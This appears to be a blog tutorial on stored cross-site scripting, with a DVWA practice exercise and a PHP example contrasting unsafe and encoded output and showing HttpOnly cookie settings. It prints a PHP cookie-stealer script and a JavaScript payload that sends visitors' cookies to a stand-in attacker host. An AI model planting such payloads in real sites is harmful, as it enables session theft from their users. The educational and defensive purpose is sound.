Stored XSS vulnerabilities are common in web applications that support interaction between several users, for example guest books, comment replies, question forms, response forms, review sections, etc. If an attacker manages to embed JavaScript in such an application, it lets him/her attack every user who interacts with the submitted data. In practice both attacks are performed in the same way, but on different types of web applications.
Performing Stored XSS Attacks
In the last post on cross-site scripting we discussed how to perform a reflected XSS attack. In this post we will discuss how to perform a stored XSS attack. A stored XSS attack is said to occur when an attacker uses an XSS vulnerability in a web application to store his/her submitted script in the web application's database, from where it is displayed to other users without being filtered or sanitized.
Let's consider a real example: suppose an attacker wants to steal users' cookies from some abcxyz forum. First of all he/she will prepare a cookie stealer. The following PHP script is a simple example of a cookie stealer (you can also create a cookie stealer with JavaScript):
<?php
$cookie = $_GET['cookie'];            // cookie value passed in the query string
$fh = fopen("cookies.txt", "a");      // open the log file in append mode
fwrite($fh, $cookie . "\n");          // record the received value
Now suppose he/she has hosted this script at http://www.attacker.com/stealer.php, where attacker.com is the hacker's website. While replying in a web application, he/she will enter his/her name and also embed JavaScript that calls the script every time someone visits the thread or reply created by the attacker. The JavaScript might appear as follows:
document.write('<img style="display: none;" src="www.attacker.com/stealer.php?cookie=' + document.cookie + '"/>');
To practice the stored XSS attack on DVWA, first set the security level to low, then select "stored XSS attack". Now in place of the name type HACKER, and in the message section type the following line:
Visit <script>alert('Hi from HACKER')</script> <a href="https://xtraweb.wordpress.com">XTRA WEB</a>
After pressing the submit button your message will be stored in DVWA. Now post any other message and you will find that the script embedded in your message, under the name HACKER, executes every time a new message is posted. Now refer to the cheat sheet and try the higher security levels. Those who understand coding should also have a look at the code snippets.
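To make the code snippets easier to read, here is an added example (not DVWA's own code) of a minimal guestbook that renders stored messages the vulnerable way and the hardened way, plus the session-cookie setting that keeps a stolen page script from reading the cookie at all. The in-memory `$sample` array stands in for the database and is a constructed input; the function names are my own.

```php
<?php
// Added example, not DVWA's code. Messages are held in a plain array here
// (constructed sample) instead of a database; the rendering is the point.

// Vulnerable: the stored message is echoed verbatim, so a submitted
// <script> tag becomes part of the page for every later visitor.
function render_vulnerable(array $messages): string {
    $html = '';
    foreach ($messages as $m) {
        $html .= "<p><b>{$m['name']}</b>: {$m['message']}</p>\n";
    }
    return $html;
}

// Hardened: every stored value is HTML-encoded at output time. ENT_QUOTES
// encodes both quote styles (needed inside attributes), ENT_SUBSTITUTE
// replaces invalid byte sequences, and the charset is stated explicitly.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_safe(array $messages): string {
    $html = '';
    foreach ($messages as $m) {
        $html .= '<p><b>' . h($m['name']) . '</b>: ' . h($m['message']) . "</p>\n";
    }
    return $html;
}

// Defence in depth: an HttpOnly session cookie is not exposed through
// document.cookie, so a script that does slip through cannot read it.
// Must be called before session_start() and before any output.
function configure_session_cookie(): void {
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
    ]);
}

// Constructed sample: the same message used in the DVWA exercise above.
$sample = [
    ['name' => 'HACKER', 'message' => "Visit <script>alert('Hi from HACKER')</script>"],
];
echo render_vulnerable($sample);   // <script> reaches the browser intact
echo render_safe($sample);         // shown as literal &lt;script&gt; text
```

Run it with `php` on the command line to compare the two outputs; in DVWA the higher security levels apply the same idea of encoding on output rather than trying to filter the input.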
If something was difficult to understand, please feel free to ask. Thanks for reading, have a nice time and keep visiting.